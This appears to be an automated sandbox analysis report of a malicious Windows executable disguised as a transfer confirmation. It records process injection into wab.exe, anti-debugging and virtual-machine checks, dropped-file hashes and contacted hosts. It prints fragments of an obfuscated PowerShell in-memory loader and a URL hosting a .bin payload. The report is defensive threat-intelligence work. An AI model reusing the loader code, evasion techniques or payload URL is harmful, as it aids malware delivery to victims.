Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: dhcpcsvc.dll	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: GetDelegateForFunctionPointer((Staden $Sammenstuvesndvningernes $Transfixed), (Schlemiels @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Convolves = [AppDomain]::CurrentDomain.GetAssemb
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Anti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Sprydstage)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Onanerendes, $false).DefineType($Ordgyder, $Vi

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_07780308 pushad ; iretd	2_2_07780321
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBA0D7 push edx; ret	2_2_08FBA0D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBA89D push 68950820h; iretd	2_2_08FBA8A3
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB5414 push eax; iretd	2_2_08FB5415
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2007 push eax; iretd	2_2_08FB203D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB296C push eax; ret	2_2_08FB296D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBAD11 push 8A950820h; ret	2_2_08FBAD17
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2E56 push edi; iretd	2_2_08FB2E66
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB0212 push edi; iretd	2_2_08FB0216
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB9B71 push eax; retf	2_2_08FB9B74
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FB2F38 push esi; ret	2_2_08FB2F39
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_08FBBB27 push 99110720h; iretd	2_2_08FBBB2F
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04465414 push eax; iretd	14_2_04465415
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446AD11 push 8A950820h; ret	14_2_0446AD17
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462E56 push edi; iretd	14_2_04462E66
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462F38 push esi; ret	14_2_04462F39
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04462007 push eax; iretd	14_2_0446203D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446A0D7 push edx; ret	14_2_0446A0D8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446A89D push 68950820h; iretd	14_2_0446A8A3
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446296C push eax; ret	14_2_0446296D
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04460212 push edi; iretd	14_2_04460216
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_04469B71 push eax; retf	14_2_04469B74
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 14_2_0446BB27 push 99110720h; iretd	14_2_0446BB2F

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	File created: \confirmation transfer note ags # 22-00379.exe
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	File created: \confirmation transfer note ags # 22-00379.exe			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 21F70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 23F70000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7556			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2106			Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: VMware
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.18.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.18.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.18.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: wab.exe, 0000000E.00000002.1925821576.00000000065FF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.18.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.18.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.18.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.18.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.18.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.18.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: wab.exe, 0000000E.00000002.1925821576.00000000065A8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW8]`
Source: Amcache.hve.18.dr	Binary or memory string: VMware20,1
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.18.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.18.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.18.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.18.dr	Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.18.dr	Binary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.18.dr	Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.18.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.18.dr	Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.18.dr	Binary or memory string: vmci.inf_amd64_68ed49469341f563

Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	API call chain: ExitProcess graph end node
Source: C:\Users\user\Desktop\Confirmation transfer Note AGS # 22-00379.exe	API call chain: ExitProcess graph end node

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F2FF7C			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior

Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.18.dr	Binary or memory string: MsMpEng.exe

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
108.167.181.251	www.reap.skyestates.com.mt	United States		46606	UNIFIEDLAYER-AS-1US	false
158.101.44.242	checkip.dyndns.com	United States		31898	ORACLE-BMC-31898US	false

Name	IP	Active
www.reap.skyestates.com.mt	108.167.181.251	true
checkip.dyndns.com	158.101.44.242	true
checkip.dyndns.org	unknown	unknown

Name	Malicious	Antivirus Detection	Reputation
http://checkip.dyndns.org/	false	URL Reputation: safe	unknown
https://www.reap.skyestates.com.mt/wp-includes/NTivwvgavzbeiE97.bin	false	3%, Virustotal, Browse Avira URL Cloud: safe	unknown

Windows Analysis Report Confirmation transfer Note AGS # 22-00379.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Windows Analysis Report
Confirmation transfer Note AGS # 22-00379.exe

Malware Threat Intel
Provided by

ID:	1481030
Product:	CloudBasic
Start time:	03:08:48
Start date:	25.07.2024
Sample:	Confirmation transfer Note AGS # 22-00379.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	baf114ac8dab2634a6f9e33cc67c4b33
SHA1:	66da72ca66c33a928a401d160875f82af9f89bc0
SHA256:	87ab493612c1a0f03673ac9592df018f5f11f9222c03dd7d63b173d9dccb0848
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_wab.exe_15d6d0e0874d72d2fcd2c8c32686e616c5a2dc_9f72327e_a18ab8e7-2a27-4583-af50-06fda05251ea\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	6A1F401239A7B8DD30CFADC1062F2119	5EED7AE339474C9E718116F4CADADA562D1D533E	723BD91DAB97DE4E6F7C63913FC8CF00471CC4A3A90671230E36E9EEE95193C4
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5987.tmp.dmp	Mini DuMP crash report, 14 streams, Thu Jul 25 03:07:03 2024, 0x1205a4 type	B2101E34A078619FD25978C561AF51B0	BE151FF6F592E0FF44B138A100CD21C288BAC019	60D96721DE078527179A99A1F8766814B2A91E5BDB1548C4FB69419F769DD1E0
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D13.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	7BB8CD84289764D70BD139821D98BFA9	DF99971D9760D3E542CD09AE45D5B27D61560D4A	42B0E8D2935602EF2CFFB0618F6BA24AF7C2F7EC70D02E800D6615A4275BD4AE
C:\ProgramData\Microsoft\Windows\WER\Temp\WER5D71.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	55C45A6450E12C68F05521688EBD6307	1107B9880B672E6E14875A42EA942ED8EB3507FC	B4F74BA556DAAB00D6C5A3623DC338174555B91B98D77429A8A30162C128A160
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache	data	106D01F562D751E62B702803895E93E0	CBF19C2392BDFA8C2209F8534616CCA08EE01A92	6DBF75E0DB28A4164DB191AD3FBE37D143521D4D08C6A9CEA4596A2E0988739D
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qrj1pcie.3uc.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xrvjjpg0.p3w.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive	BAF114AC8DAB2634A6F9E33CC67C4B33	66DA72CA66C33A928A401D160875F82AF9F89BC0	87AB493612C1A0F03673AC9592DF018F5F11F9222C03DD7D63B173D9DCCB0848
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\Confirmation transfer Note AGS # 22-00379.exe:Zone.Identifier	ASCII text, with CRLF line terminators	187F488E27DB4AF347237FE461A079AD	6693BA299EC1881249D59262276A0D2CB21F8E64	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Afhjemlingen\ondskabsfuldhedernes.txt	ASCII text, with very long lines (367), with CRLF line terminators	9524154CFD936F21394F74D000856732	3A45FE1B1EAAE9A1CAF11CA59FEBA1B3DE8E0CA3	8EE6AE6BD6F5AF379B359A0CDD7721AEAEE0989C4B61431F2EAB1240FBBA56A2
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Jordfyldens\lokalplanrammes.sus	data	D0A61E12A7A27A4B719AB0C4B9F57B88	55A349C760BA7AF05C54934924E2C0289BB3FF24	243221C7BE40D55E82FDF162332959F85DF94CAF3EC8BC550EEE0DE0FC814A64
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Rotan.Bru	ASCII text, with very long lines (65536), with no line terminators	AA4F469C337E81FDCD252F4E841CA7E5	65C8CA0311B68D764B0FAD3D6EA5061411818D12	37AF5B072C0AF07340DA85766673FF77278951CD45A75E11B51208D83CF4E591
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Ungilled.Cad	data	90DEE1AE90F5B4B7DF59B0A7B0F529C3	673B784036DED375DC2525F026E7E9B1C02D73A1	C6D6966B18C7F00B542AE5FF5103D8487E2529715F5B0A6500EDE8806AE939CD
C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\grensav.sjl	data	B9E5947712FA407B58A8527B52CE050E	9FD16F2F3569FF478C591E16A03EF65F7D63E57E	30B60EB19A5E7A32DAB61A17C1BCA485D8040EE9488024AA031C0190A7DCB510
C:\Users\user\AppData\Local\Temp\nshABD4.tmp	data	AB2E96D72C30FD165FC5224EDF7F7914	1EFDDE4B5BEB0DF8CAE0E89963B47BA9D0FDA9F4	CF45128B9471DF424AF93918ED654A44522C3C4008E920DD0D1FF83FF8A9B16C
